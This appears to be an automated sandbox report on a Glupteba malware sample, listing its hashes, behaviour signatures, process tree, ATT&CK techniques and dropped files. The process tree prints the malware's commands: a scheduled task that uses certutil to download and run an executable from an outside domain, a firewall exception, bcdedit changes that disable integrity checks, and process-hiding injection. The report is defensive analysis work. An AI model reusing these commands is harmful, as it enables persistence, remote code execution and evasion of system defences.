Resubmissions
02-09-2022 02:49
220902-dbgmjafabp 1002-09-2022 02:36
220902-c3scnshbc7 1012-08-2022 07:02
220812-httr2aceh7 10Analysis
-
max time kernel
372s -
max time network
394s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
02-09-2022 02:49
Errors
General
-
Target
csrss.exe
-
Size
4.5MB
-
MD5
2f29ebdaf7b3395ebdadb13f453177c7
-
SHA1
20913d2d3c145adf43af7f13108cd1eb974862ca
-
SHA256
5d856f4c0a6a3d6a13cc4b0786328e49511923b3ca208d93010c8e6b122bc708
-
SHA512
27c258f7f4f9add24666daadf62008bff00f224723623b0463a9d455254cfcbbbcda92488530dcb41a3fad0d688c15630e0d8eda3c6fce031db1a91fc9e03ce7
-
SSDEEP
98304:477X24Nev1+NrGJ4FSBiD+Fon/wpCmreluztZi3:kX243NrGk+F+/wYmt
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 8 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Windows security bypass 2 TTPs 9 IoCs
-
Modifies boot configuration data using bcdedit 14 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Loads dropped DLL 13 IoCs
-
Windows security modification 2 TTPs 9 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Windows directory 4 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies Internet Explorer settings 1 TTPs 64 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 4 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of SetWindowsHookEx 39 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\csrss.exe"C:\Users\Admin\AppData\Local\Temp\csrss.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss.exe"C:\Users\Admin\AppData\Local\Temp\csrss.exe"2⤵
- Windows security bypass
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 05⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 15⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 05⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3096 /prefetch:81⤵
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220902045015.log C:\Windows\Logs\CBS\CbsPersist_20220902045015.cab1⤵
- Drops file in Windows directory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3512 /prefetch:21⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3684 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:11⤵
-
C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleUpdateBroker.exe"C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleUpdateBroker.exe" -Embedding1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1564 /prefetch:11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4040 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4336 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=500 /prefetch:11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4136 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1952 /prefetch:11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1116,18081279910147819767,2693917499026879728,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2884 /prefetch:81⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\PowerShell-7.2.6-win-x64.msi"1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6bd4f50,0x7fef6bd4f60,0x7fef6bd4f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1124,65735465918689535,13683421208910400007,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1152 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1124,65735465918689535,13683421208910400007,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1240 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6bd4f50,0x7fef6bd4f60,0x7fef6bd4f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1124,16583566955803474943,12105880449446371594,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1136 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1124,16583566955803474943,12105880449446371594,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1336 /prefetch:82⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2532 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\PowerShell-7.2.6-win-x64.msi"1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"1⤵
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\DenyRestart.dot"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5741⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
2Impair Defenses
1Install Root Certificate
1Modify Registry
5Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\37C951188967C8EB88D99893D9D191FEFilesize
1KB
MD5e86e576bc880640a1f610ab00153b06b
SHA1449844ae688263173b6dc2b40e5b63ef50b6eaf3
SHA256e9701e2a8f6974e0e194e50b523c8dab121fa7a76562a22c6a75ecafd70a5fda
SHA5129bff963ea5dad43b2c6e28e64a990ab67f84026c4ea08b4a3d53910dc072a13d621c6616295d77698bba2dd62f507a7d364462defcb9da2ad8cfff2dc5a1c2e9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868Filesize
471B
MD5fcce816be572926b07bf5b899efb6fbe
SHA1354e59f5b9b5fa6a3701a1f3ca078bf655f3d5fb
SHA2562fe01ccf569b4e82c86dbc813e67ce3e3f738023defc60dd3bfe79a1f0c4a3f4
SHA512ce778ff7ac212abd6a23a80db71e022f0de0052250da29e646807e6b372a33fca224de9725827005f89d54c86e03e0ca50dea19004a54e6fd6691940f6dcd48a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
60KB
MD56c6a24456559f305308cb1fb6c5486b3
SHA13273ac27d78572f16c3316732b9756ebc22cb6ed
SHA256efc3c579bd619ceab040c4b8c1b821b2d82c64fddd9e80a00ec0d7f6577ed973
SHA512587d4a9175a6aa82cd8bb1c11ca6508f95cd218f76ac322ddbd1bc7146a0e25f8937ee426a6fb0fb0bb045cedb24d8c8a9edfe9f654112f293d8701220f726b4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\37C951188967C8EB88D99893D9D191FEFilesize
264B
MD5aa9aa794aa094426991c0eb80e68cf78
SHA12c085320cc215518599d9fc55b5036c1df231e7a
SHA256c81d8f90ce38ce75531637da5100a3166829a4c0353a7290e9f897518e9b99cf
SHA5122b98b45a999e48907ed962aea60acf7c10c81fce2df5a86c102e90c4fe08f88816e23493ed701b68ef26012fd2447ca2399529a374e7fc1ee56b34c3ba9b895b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868Filesize
412B
MD5de1b43b69086d778d3370d2c47875e96
SHA1149030c4aaf702456e7bceec45a36dd7752bdfdd
SHA2565e17bee874864bafae522929f2e05b697b71e4843cbb597a36a581bdbda2b1fd
SHA512a2dac557b5e3ea14684d257298bf079d59b77b8bd5ef8b3b334671e2e0906a2bdc91e3da50ebea015cbc2d6ff01522dd7d5b0afc097016a34c93a44f3d848d7a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
340B
MD57730b841b1c86bb093ad96c6fe33496a
SHA111da8fe7824edee669d7e595b4c3a7cae37eb97d
SHA2563f6cf37c4301a9414a0826b81933b0e708e2b89b68ed33499941aaefc3b052ff
SHA51224b9c04455d70d04c837e5af42dc1887676e6009b9f0fa1a19637beaa09182576eb850219399b9886d7704aa91436c2c1b9e97c6aa7c36c544320edd7ed33d48
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
304B
MD54bcdff287aff2cbf2c79013abd8ee9f8
SHA127079b1a8b60d8e4e8e05c1b0f734163d52b51e0
SHA25670c4ad06de10dd669a65d9a4d4fdfdc2076477f12a4754e64b4a15a762bc516c
SHA5125392fb42a854ffe64a27356ddbfdbb9751deb3fd65f4b11898faed6690037c14de887c9ecfe87e66a46e940c58ee034c362404684e2030654b8c2f37afbb5188
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
304B
MD55da7c422f881c724971cf756a85f7a84
SHA1c629836b2b9b205d79b95dede44750ff9a09b427
SHA256179a94411b6101e08757deea8d6308810464093420ac644974e1ef27346c4c9e
SHA512fd9e7de2e4ed3f63fdbbd642bd49e80bffb550f691ea923b041b013e93daeeb94ca07fb2ec44c2205967f3db725f686abc2eedb81aaa6671fbcffbc3368a7573
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
304B
MD5402a4e2e230cd9293d4a1826caa104c5
SHA1fc0f87cd781f06856d268ce16dd1dc08309e7a1e
SHA256d45602ba744029ba40a86dfe5b91791ae2d532de01a78cc870e2aea351a008e3
SHA512be068255fb009e10f9f1bbd05be93b73d2027cb778399ffa25369b6be18c3a381516e90bb7c3e2fade3051a1ac1d30ea367e8a80b5c3bf9552976064d3481dbf
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datFilesize
40B
MD5ca0c469b8152e7e371cf08d73b026433
SHA107a87b72da129c4af371a735398bd1aefdb0e74a
SHA25649bf5be3f0eae3a1851a7ac6e98c2aacfd41d04b0bee3f34ea75d3fe76ac4996
SHA5122a051c82401a439602f6400b7af49353c869f464815dbefe068c3ad6249f7875e42d4c486dfdc22e60d54f711afc339491bb74922bba551df98e9ec0780dbafa
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
179KB
MD5cc2c339b588066a24ca847b77c264e68
SHA1ad3939f8ca7f79a20cabe78fc8ae8d47687401ed
SHA2569286fce79ddc0d58710ce49de8435af174891c311e68526197f227f0cc3242f0
SHA5125edb23bf93964123162bd4394354c1ae31c6623a4b84146e998e15b6f496b9c621772c85f06c6ea82d2eafb852427dd38d4507b27a98dd6c5e5fef5fa5eb97d8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1Filesize
264KB
MD5b1a97985fa08909b348f43f3d07c7073
SHA18b476bd8dacf55b0d8f9138e399ecb77d099ea1f
SHA256af0fc51713d8310069bc8e4a0205a8cb3f707fc2f76ff4e5387b6e46ef50b4aa
SHA512907d2566c246f6783073d12195ca3c86e5b0725e30c661caae149ae70713d010ef9c520e79206a87a594e20baec062160426297ce310232345e8cdeaac7eb7bd
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\lwrmjt1\imagestore.datFilesize
21KB
MD563463b678756ceca02d2345a65ed6ac6
SHA1057c25018cbf865a43b973c37f9e257dff93f540
SHA256a3f59877681e490a63207124de37a1ba13cee1149051524a33f5c4054a611123
SHA512a8b2b23d4195c9e4dfedd1cbdb9cadbeffc655c005d106ef7e9d76ee4afaf3b65bbb8d9d86863a93fa894ac0bfae22e94f64a4ba3a0fd55642901ba4993bd9c8
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeFilesize
94KB
MD5d98e78fd57db58a11f880b45bb659767
SHA1ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeFilesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\KTJCP0XZ.txtFilesize
603B
MD5bd03b44afb916ccb5d02ff4649111c04
SHA1055a6d408e92bb85ab667f25d9319cd25607f823
SHA2565facb2c55c6d369657f2ea4e1d896fd3a26184dc8f311de982e0c61dc4cf11e1
SHA512845477826af81ae0472458c76d276ba7382312f464430decdf702780a124c2cdff4614d52520c1f43a35ade8e23deb3bb8e470a985cae394ce524393dec56ad8
-
C:\Windows\rss\csrss.exeFilesize
4.5MB
MD52f29ebdaf7b3395ebdadb13f453177c7
SHA120913d2d3c145adf43af7f13108cd1eb974862ca
SHA2565d856f4c0a6a3d6a13cc4b0786328e49511923b3ca208d93010c8e6b122bc708
SHA51227c258f7f4f9add24666daadf62008bff00f224723623b0463a9d455254cfcbbbcda92488530dcb41a3fad0d688c15630e0d8eda3c6fce031db1a91fc9e03ce7
-
C:\Windows\rss\csrss.exeFilesize
4.5MB
